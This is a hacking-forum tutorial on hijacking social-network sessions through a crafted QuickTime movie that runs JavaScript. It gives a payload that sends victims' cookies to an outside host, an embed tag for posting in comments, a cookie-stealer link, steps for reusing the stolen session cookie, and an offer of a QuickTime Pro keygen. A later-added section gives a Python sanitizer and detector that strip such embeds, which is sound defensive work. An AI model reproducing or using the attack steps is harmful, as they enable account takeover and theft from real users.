Session Hijacking using a Crafted QuickTime Backdoor XSS that allows attackers to execute arbitrary JavaScript.
Requirements:
- Knowledge of HTML
- Quicktime Pro
- Cookie editor
- Cookie Stealer
- Hosting
I will first introduce some security issues of many social network sites. Social network sites such as TagWorld, MySpace, and Friendster allow their users to use HTML tags. This is very dangerous, because it allows users to break out of the site's HTML rules and execute dangerous code. This includes JavaScript, which is very dynamic and is used in many session hijacking and phishing attacks. Many social networks today are under attack by hackers due to failures in their security measures, including MySpace and TagWorld. A common exploit that has been used against them is the Flash redirect, in which an embedded Flash file redirected the user without any interaction by calling the getURL() method in ActionScript. Now that they have fixed that, attacks are becoming more complex. An example of this is the QuickTime backdoor XSS discovered by GNUCITIZEN, which is being used to hijack many profiles on social networking sites.
This tutorial will show how to craft a QuickTime exploit and use it to hijack sessions.
How to Create the QuickTime Exploit:
I am assuming you have QuickTime Pro, so we go on. First create a text file and put the JavaScript code in it, surrounded by tags. Then add parameters before and after the code so that the exploit runs automatically.
A (totally random) example would be:
A<javascript:window.location=http://myspace12.php0h.com/cookie.php?c=+escape(document.cookie);> T<>
The prefix A defines that the action will be automatic: no user interaction is required. There is also the T flag, which specifies the target for the action; in this case it is null.
Now save the text file and name it whatever you want. Then open QuickTime Pro and click File --> Open File. Select All Files and open the text file we have made. This prints the text onto a black background in the movie. Now go to Window --> Movie Properties and uncheck Text Track. After that, rename Text Track to HREFTrack. As soon as you're done, save the movie and name it whatever you like.
Now to obtain a cookie stealer. Hmm, well you could code it yourself, or if you are not a PHP coder you can use System_Meltdown's PHP cookie stealer. You can get it at http://www.hellboundhackers.org/readcode.php?id=16 .
Now to include the QuickTime movie (aka the backdoored XSS), we use HTML's embed tag.
For Example:
<embed type=video/quicktime allowscriptaccess=never allownetworking=internal enablejsurl=false enablehref=false saveembedtags=true src=http://Your_host_here/Your_movie_here.mov height=0 width=0>
Just post the code in a comment or bulletin on any social networking site, and voila, you should be receiving some cookies in the output file of the PHP cookie stealer script, which is cookies.htm. As soon as you've obtained your victim's cookie, look for the MYUSERINFO part of the cookie. This data holds the user's session.
NOTE: Only people who have QuickTime installed are vulnerable to this exploit (not to worry, because almost everyone does).
If you want a visual view of the tutorial, download my video!! http://www.megaupload.com/?d=4WSSCJQ8 It includes a keygen for QuickTime Pro, so you don't have to try to find one. Consider it a gift. :D
Well, time to give out the credits. Greets to Matthewtheexploit for finding the exploit in MySpace and to GNUCITIZEN for crafting it and spending the time to find and make the exploit.
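The attack above works only because the site passes user-submitted HTML, including the embed element, through to other users' browsers unchanged. What follows is an added example (not part of the original post, and not any site's real code) of the server-side check a defender would apply to comments and bulletins: an allow-list sanitizer that keeps a few formatting tags, strips everything else (embed, object, script and the like), drops any href or src that is not a plain http(s) URL, so javascript: links never survive, and flags a stripped element that looks like a hidden QuickTime embed so the post can be logged or reviewed. The sample comment and the example.invalid host are constructed for this example.

```python
from html import escape
from html.parser import HTMLParser

# Tags and attributes a comment may keep. Anything not listed is dropped,
# so <embed>, <object>, <script>, <iframe> etc. never reach other users.
ALLOWED_TAGS = {"b", "i", "u", "p", "br", "a", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
VOID_TAGS = {"br", "img"}
URL_ATTRS = {"href", "src"}


def _safe_url(value):
    """Allow only http(s) URLs. Whitespace and control characters are removed
    first because browsers skip them inside a scheme (e.g. 'java\\tscript:')."""
    if value is None:
        return False
    cleaned = "".join(ch for ch in value if ch.isprintable() and not ch.isspace())
    return cleaned.lower().startswith(("http://", "https://"))


class CommentSanitizer(HTMLParser):
    """Rebuilds the comment from scratch using only allow-listed markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []  # (tag, attrs) of every element that was stripped

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append((tag, dict(attrs)))
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in URL_ATTRS and not _safe_url(value):
                continue  # javascript:, data:, vbscript: ... all rejected
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text (including the body of a stripped <script>) is always escaped.
        self.out.append(escape(data, quote=True))

    def handle_comment(self, data):
        pass  # HTML comments never reach the output


def sanitize_comment(html):
    """Return (clean_html, dropped_elements) for user-submitted comment HTML."""
    parser = CommentSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.dropped


def flags_quicktime_embed(dropped):
    """Detection hook: True if a stripped element looks like the hidden
    QuickTime movie embed from the post (embed/object with a quicktime type
    or a .mov source), so the submission can be logged or reviewed."""
    for tag, attrs in dropped:
        if tag not in ("embed", "object"):
            continue
        kind = (attrs.get("type") or "").lower()
        src = (attrs.get("src") or "").lower()
        if "quicktime" in kind or src.endswith(".mov"):
            return True
    return False


# Constructed sample comment: harmless formatting, a hidden QuickTime embed
# (as in the post, but pointing at a reserved example host) and a javascript: link.
SAMPLE_COMMENT = (
    "<b>nice profile!</b> "
    "<embed type=video/quicktime src=http://example.invalid/movie.mov height=0 width=0> "
    '<a href="javascript:alert(document.cookie)">click</a> '
    '<a href="http://example.invalid/page">ok</a>'
)

if __name__ == "__main__":
    clean, dropped = sanitize_comment(SAMPLE_COMMENT)
    print(clean)
    print("stripped:", [t for t, _ in dropped],
          "quicktime embed:", flags_quicktime_embed(dropped))
```

Run as a script it prints the cleaned comment and the names of the stripped elements. The allow-list design is the point: a block-list that only removes an embed with type=video/quicktime has to anticipate every variant, whereas an allow-list rejects anything it was not told to keep. This check covers the delivery step only; the exfiltration step in the post reads document.cookie, which the HttpOnly cookie attribute prevents for a session cookie.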
Have Fun!
-Insidious